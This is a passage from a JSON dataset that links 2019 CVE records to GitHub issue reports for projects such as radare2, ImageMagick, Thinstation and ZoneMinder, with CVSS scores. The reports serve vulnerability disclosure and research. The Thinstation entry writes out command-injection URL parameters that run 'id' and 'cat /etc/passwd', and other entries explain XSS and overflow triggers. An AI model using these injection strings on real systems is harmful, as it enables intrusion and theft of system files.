        "Issue_Created_At": "2019-06-05T14:27:51Z",
        "description": "Potential XSS exploit in hapi fhir testpage overlay. This is a public tracking ticket to document the fix for an XSS exploit reported by Mudit Punia and Deshuyant Garg. The issue has been corrected in HAPI FHIR NUMBERTAG ia the following commit: URLTAG In this issue, when using the hapi fhir testpage overlay (the testing UI most known for its display on FILETAG ) several URL parameters are not sanitized. This could lead to information disclosure (such as cookies) via a specially crafted URL.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12760",
        "Issue_Url_old": "https://github.com/davidhalter/parso/issues/75",
        "Issue_Url_new": "https://github.com/davidhalter/parso/issues/75",
        "Repo_new": "davidhalter/parso",
        "Issue_Created_At": "2019-06-11T08:51:37Z",
        "description": "Deserialization vulnerability ( CVETAG ). Vulnerability Description : See CVETAG URLTAG Note : Let us be honest, this should be very unlikely to be exploitable in the wild.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-12771",
        "Issue_Url_old": "https://github.com/Thinstation/thinstation/issues/427",
        "Issue_Url_new": "https://github.com/thinstation/thinstation/issues/427",
        "Repo_new": "thinstation/thinstation",
        "Issue_Created_At": "2019-06-06T23:12:21Z",
        "description": "CGI Generic Command Execution APITAG on NUMBERTAG Could affect latest version. The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi APITAG and /cgi APITAG APITAG /cgi APITAG action=;id eject;ifconfig back;ls alt forward;whoami pause;hostname /cgi APITAG OK=;cat /etc/passwd Please patch asap. Could affects up to latest versions. For more information read: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12779",
        "Issue_Url_old": "https://github.com/ClusterLabs/libqb/issues/338",
        "Issue_Url_new": "https://github.com/clusterlabs/libqb/issues/338",
        "Repo_new": "clusterlabs/libqb",
        "Issue_Created_At": "2019-03-01T14:15:25Z",
        "description": "Insecure Temporary Files. Libqb creates files in world writable directories ( APITAG , APITAG ) with rather predictable file names (e.g. APITAG in case of APITAG Also APITAG flag is not used when opening the files. This could be exploited by a local attacker to overwrite privileged system files (if not restricted by sandboxing, MAC or symlinking policies). At least APITAG flag should be used. I'd also use more complex logic where files are created with unpredictable names (also using APITAG ) and then possibly renamed to match file naming convention (if the protocol does not allow completely random file names). I would not use files for IPC.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12790",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/14211",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14211",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2019-06-02T19:35:30Z",
        "description": "ragg2 crash on long valid input.. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2caa3 commit: APITAG build NUMBERTAG Expected behavior APITAG Actual behavior APITAG Steps to reproduce the behavior Unzip FILETAG and you will get APITAG Additional Logs, screenshots, source code, configuration dump, ... After checking the source code, the vulnerability is caused by lacking boundary checking for \"egg APITAG URLTAG , resulting a heap buffer overflow. It could be fixed quickly by adding associated checking.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12791",
        "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/1921",
        "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/1921",
        "Repo_new": "serghey-rodin/vesta",
        "Issue_Created_At": "2019-07-29T17:28:57Z",
        "description": "SECURITY: two privilege escalation from regular user to root. APITAG for the dramatic subject.) Well, it's really disappointing and unprofessional to come to this... Two months ago NUMBERTAG I disclosed two privilege escalation vulnerabilities to EMAILTAG (and eventually also to EMAILTAG and EMAILTAG ), I obtained no useful replies or actions so I'm trying to reach a wider audience by opening an issue here (and no, I won't join the forum). As today the two vulnerabilities are still undisclosed as I fairly believe that a responsible disclosure approach is the right way to go. Yet we're pushing the boundaries here and I don't think the maintainers are being respectful of the userbase. So this is my last attempt to get these issues fixed, after that I will disclose them anyway, fixed or not. Users having write access to this repo can reach me privately for details, it's even better if they reply to the original message sent to the above EMAILTAG addresses, provided that they're allowed to do that.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12802",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/14296",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14296",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2019-06-13T18:56:39Z",
        "description": "Ragg2 Lacks Boundary Check when Changing Context . Ragg2 lacks boundary check when changing context in here URLTAG . When APITAG or APITAG , CTX would be out of boundary. As a result, it could cause both invalid memory access and invalid free. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a NUMBERTAG ca commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior Invalid Memory Access APITAG Invalid Free ERRORTAG Steps to reproduce the behavior Follow actions mentioned above. Additional Logs, screenshots, source code, configuration dump, ... Invalid Memory Access FILETAG Output of valgrind: ERRORTAG Invalid Free FILETAG Output of valgrind ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12814",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2341",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2341",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-06-04T04:08:07Z",
        "description": "Block yet another gadget type (CVE to be requested). Similar to other polymorphic types with no limits, but for XXE with APITAG . Need to request CVE ID.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-12822",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/285",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/285",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2019-06-14T02:14:42Z",
        "description": "Header parsing causing invalid memory reference. Overview A security vulnerability affecting APITAG versions NUMBERTAG has been identified. This bulletin discusses this flaw and its implications. Summary An invalid set of HTTP headers may trigger an out of bounds memory access. Description The following request will trigger a memory assertion and subsequent out of bounds memory access. Depending on the system, compiler, operating environment and configuration, this could lead corrupted execution and a denial of service. APITAG Threat Scope Versions up to and including NUMBERTAG Remedy Upgrade to NUMBERTAG when released or apply the following patch: ERRORTAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . References APITAG Issue URLTAG CVE CVE pending. Thanks Thanks to Yakun Zhang and Zheng Huang of Baidu Security Lab for finding and diagnosing this issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12829",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/14303",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14303",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2019-06-15T04:49:02Z",
        "description": "Function r_parse_parse Lacks Boundary Check. For APITAG (and other APITAG function parse URLTAG lacks a boundary check for newstr , leading heap /stack based buffer over write. Such buffer overflow could be trigger from rasm2 URLTAG . As r_parse_parse URLTAG , which actually calls function parse URLTAG for APITAG could extend APITAG and write back to APITAG , it would cause a heap based buffer over write. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG ga1ade7d NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior CODETAG Steps to reproduce the behavior Follow actions mentioned above. Additional Logs, screenshots, source code, configuration dump, ... Output of valgrind: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12835",
        "Issue_Url_old": "https://github.com/JayXon/Leanify/issues/52",
        "Issue_Url_new": "https://github.com/jayxon/leanify/issues/52",
        "Repo_new": "jayxon/leanify",
        "Issue_Created_At": "2019-05-24T18:22:27Z",
        "description": "Fuzzing Tests: OOB Write in XML Parser. Controlled Length Out of Bounds Write Using the corpus of test files from the previous crash I also included an XML file. The crash is relative to the XML library implementation of Leanify resulting in another issue with an OOB write independent of the fixed OOB APITAG in ICO. I discovered this via fuzzing and did some light root cause analysis and another party heavily expanded on the exploitability of this issue. Details below: A moderately controllable memory corruption vulnerability affects the implementation of xml_memory_writer in APITAG as shown below: ++ struct xml_memory_writer : pugi::xml_writer { uint8_t p_write; void write(const void data, size_t size) override { memcpy(p_write, data, size); Line NUMBERTAG p_write += size; } }; } // namespace pugi::xml_writer implementations should additionally track the capacity of the target buffer as shown in the pugixml documentation here: FILETAG It is possible to control the amount of data written past the end of the buffer by appending characters that require escaping as shown in the text_output_escaped function in APITAG as shown below: ++ PUGI__FN void APITAG writer, const char_t s, chartypex_t type, unsigned int flags) { / TRUNCATED / switch ( s) { case NUMBERTAG break; case '&': APITAG 'a', 'm', 'p', ';'); ++s; break; case ' APITAG ': APITAG 'g', 't', ';'); ++s; break; case '\"': APITAG 'q', 'u', 'o', 't', ';'); ++s; break; default: // s is not a usual symbol { unsigned int ch = static_cast<unsigned int>( s++); assert(ch APITAG ((ch NUMBERTAG static_cast APITAG ((ch NUMBERTAG TRUNCATED / The following base NUMBERTAG test case will crash the target binary by expanding a number of & to the escaped &amp; (a gain of NUMBERTAG bytes in extension). APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG For full stack trace on the crash, see the ASAN output below: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG b7fce NUMBERTAG at pc NUMBERTAG b7af7a NUMBERTAG bp NUMBERTAG bfffc8f8 sp NUMBERTAG bfffc4cc WRITE of size NUMBERTAG at NUMBERTAG b7fce NUMBERTAG thread T NUMBERTAG b7af7a NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG b7af7c2f in memcpy ( PATHTAG NUMBERTAG a NUMBERTAG c in (anonymous APITAG const , unsigned int) [clone . APITAG APITAG NUMBERTAG d NUMBERTAG e in flush PATHTAG NUMBERTAG d NUMBERTAG in pugi::impl::(anonymous APITAG [clone . APITAG PATHTAG NUMBERTAG bfed4 in APITAG char const , unsigned int, pugi::xml_encoding) const PATHTAG NUMBERTAG b5fe in APITAG int) APITAG NUMBERTAG af NUMBERTAG in APITAG , unsigned int, unsigned int, APITAG std::char_traits APITAG , std::allocator APITAG > const &) PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG PATHTAG NUMBERTAG b1cde in main PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) The testfile was generated using the AFL fuzzer by lcamtuf.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12865",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/14334",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14334",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2019-06-17T05:08:54Z",
        "description": "Double Free in cmd_mount Causes Crash. Function cmd_mount URLTAG would Double Free cwd URLTAG via malicious commands. Basically, first command ms to get in fs_shell URLTAG would cause cwd = strdup(path) URLTAG . After returning from fs_shell, r2 will free cwd URLTAG . Note that cwd is not reset as NULL. Later, command ERRORTAG would let r2 goes into r_fs_shell_prompt URLTAG , but returns here URLTAG without resetting cwd . Then, cwd is double freed. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | malloc NUMBERTAG Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG b8e2d5 commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior ERRORTAG Steps to reproduce the behavior Follow actions mentioned above Additional Logs, screenshots, source code, configuration dump, ... This double free could be fixed by replacing free as APITAG here URLTAG Output of valgrind ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12872",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/16624",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/16624",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2019-05-28T15:06:21Z",
        "description": "APITAG for Security Issue. This is a placeholder for a reported security issue details can be be found here: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-12950",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2638",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2638",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2019-06-25T14:22:03Z",
        "description": "Stored XSS. Steps to reproduce NUMBERTAG Create a CSV file with the following data: ERRORTAG NUMBERTAG From Teampass, go select APITAG items\" feature NUMBERTAG On the CSV tab, select the file previously created NUMBERTAG Select the item with XSS payload to import That's all... we can tap to item and XSS payload will be executed. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-12966",
        "Issue_Url_old": "https://github.com/zxlie/FeHelper/issues/63",
        "Issue_Url_new": "https://github.com/zxlie/fehelper/issues/63",
        "Repo_new": "zxlie/fehelper",
        "Issue_Created_At": "2019-06-26T03:36:43Z",
        "description": "arbitrary code execution when formating json. poc: ERRORTAG FILETAG FILETAG when the web with single js content, it may result code execution. (it shouldn't be executed when broswe a single js file without any html tag). I discovered the insecure code in APITAG , line NUMBERTAG to line NUMBERTAG additionally, I understand the code is compatibilized for bad json content like APITAG , but as a result, it's insecure.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12974",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1515",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1515",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-21T03:25:02Z",
        "description": "Null pointer deference in function APITAG in coders/pango.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a null pointer deference vulnerablity in function APITAG in coders/pango.c ERRORTAG ( URLTAG The return value of APITAG may be NULL, and then there is a null pointer deference. See CVETAG and URLTAG for details.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12975",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1517",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1517",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-21T06:25:46Z",
        "description": "Possible but rare memory leak in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a possible but rare memory leak in function APITAG in coders/dpx.c. ERRORTAG We should call ERRORTAG when condition APITAG satisfies behind for loop. See commit URLTAG for more details.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12976",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1520",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1520",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-21T07:25:10Z",
        "description": "Memory leak in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak in function APITAG in coders/pcl.c. ERRORTAG We should call APITAG before return statement. CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12977",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1518",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1518",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-21T06:44:34Z",
        "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a use of uninitialized value vulnerability in function APITAG in coders/jp2.c. CODETAG URLTAG We should call APITAG after declaration. See CVETAG URLTAG and APITAG for detail.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12978",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1519",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1519",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-21T06:54:58Z",
        "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a use of uninitialized value vulnerability in function APITAG in coders/pango.c. ERRORTAG URLTAG We should call ERRORTAG when condition APITAG satisfies. Otherwise, there will be a use of unintialized value vulnerablity. See CVETAG CVETAG URLTAG and URLTAG for more details.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12979",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1522",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1522",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-21T11:58:29Z",
        "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is an issue in function APITAG in APITAG The issue is similar to CVETAG which was fixed in URLTAG CODETAG Below is the proposal patch. CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12995",
        "Issue_Url_old": "https://github.com/istio/istio/issues/15084",
        "Issue_Url_new": "https://github.com/istio/istio/issues/15084",
        "Repo_new": "istio/istio",
        "Issue_Created_At": "2019-06-24T05:36:31Z",
        "description": "JWT authentication causing APITAG NUMBERTAG terminated with an error\" in Envoy. Bug description I'm trying to implement service to service JWT authentication like something shown in this URLTAG repo. While it's working fine with Auth0, I'm having trouble while setting it up with my company's authentication service. I made the service architecture by following this URLTAG article, you can see my repository here URLTAG . This is the policy I'm applying > CODETAG I'm hosting the public key locally, you can find it FILETAG too. If I hit the service with an invalid access key (say it's expired), I'm getting a NUMBERTAG as expected, but a valid access key gives a ERRORTAG Upon checking the logs for the envoy proxy of the publisher pod, I can see this > ERRORTAG This log message isn't there when working successfully with Auth0, so I think this might be a hint. But looking at the lines in the source code where this log message is present, I can't figure out much.... One reason I think this might occur is the different keys in access token I'm passing. The Auth0 access token has the following keys > CODETAG And my access token looks like this > CODETAG Anybody has any ideas, I've been stuck for quite some time now, any help will be appreciated..! Affected product area (please put an X in all that apply) ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [ ] Performance and Scalability [x] Policies and Telemetry [x] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastrcture Expected behavior NUMBERTAG on valid Access Token Steps to reproduce the bug Sadly not possible, as the access token I'm using is private to my company :( Version (include the output of APITAG and kubectl version ) ERRORTAG CODETAG How was Istio installed? Helm template, I followed [this URLTAG article. Environment where bug was observed (cloud vendor, OS, etc) Windows NUMBERTAG running the cluster on Minikube. Additionally, please consider attaching a FILETAG ) by attaching the dump file to this issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12997",
        "Issue_Url_old": "https://github.com/icon-project/loopchain/issues/231",
        "Issue_Url_new": "https://github.com/icon-project/loopchain/issues/231",
        "Repo_new": "icon-project/loopchain",
        "Issue_Created_At": "2019-06-20T07:49:55Z",
        "description": "Command Injection. Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. Details: APITAG An attacker can manipulate DEFAULT_SCORE_HOST which is trusted user supplied input, this can be used to inject commands and gain arbitrary code execution. Affected URL: FILETAG Affected Code: APITAG Reference: URLTAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13032",
        "Issue_Url_old": "https://github.com/Sigil-Ebook/flightcrew/issues/53",
        "Issue_Url_new": "https://github.com/sigil-ebook/flightcrew/issues/53",
        "Repo_new": "sigil-ebook/flightcrew",
        "Issue_Created_At": "2019-06-26T15:32:15Z",
        "description": "Null Pointer Dereference. Summary An issue was discovered in APITAG NUMBERTAG and earlier. A NULL pointer dereference occurs in APITAG when a null pointer is passed to APITAG Details If the package.opf contains APITAG elements without \"href\" attributes, then the variable \"href\" is set to an empty string on APITAG URLTAG . On APITAG URLTAG , APITAG is called which returns a NULL pointer if href is empty. This pointer is then passed to APITAG which dereferences it, causing a segmentation fault. In the attached FILETAG , you'll see that the href attributes in EPUB/package.opf have been replaced by the attribute \"malformed\". Impact This vulnerability has very little security impact for Sigil users, but may be used as a Denial of Service attack against third party software that uses APITAG as a library. Steps to reproduce NUMBERTAG Download the attached APITAG NUMBERTAG On a linux system, process APITAG using flightcrew cli. APITAG At this point, flightcrew cli will segfault. FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13067",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/183",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/183",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-06-20T12:23:30Z",
        "description": "heap buffer overflow in nxt_utf8_decode APITAG NJS version: CODETAG JS Testcase: ERRORTAG ASAN log: ERRORTAG Found by fluff URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13068",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/17718",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/17718",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2019-06-24T08:15:00Z",
        "description": "HTML injection in panel links (drilldown). You can inject image tags in panel drilldown links (via Title & url fields). There is no script injection as this already sanitized. But for these fields there is no need to have html here. Problem is here: URLTAG Think using escape function when building the html there would solve it. Here is where you can replicate it APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.5,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13072",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2642",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2642",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-06-18T00:07:40Z",
        "description": "Stored Cross Site Scripting Filters. APITAG version NUMBERTAG Installed from PPA APITAG Xenial) Ubuntu NUMBERTAG enial The APITAG page in APITAG NUMBERTAG is vulnerable to stored cross site scripting due to improper input sanitation in the APITAG field. This is the latest version available in the Ubuntu NUMBERTAG PPA. Please see attached screenshots. APITAG APITAG Steps to reproduce the behavior NUMBERTAG Go to the APITAG page NUMBERTAG In the APITAG field paste in a javascript payload such as APITAG APITAG NUMBERTAG Refresh the page to verify that the payload executes and remains stored through browser sessions. Expected behavior: The user input fields should be sanitized. Special characters should be limited or escaped to prevent injection of malicious code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-13086",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/19",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/19",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2019-06-19T14:18:29Z",
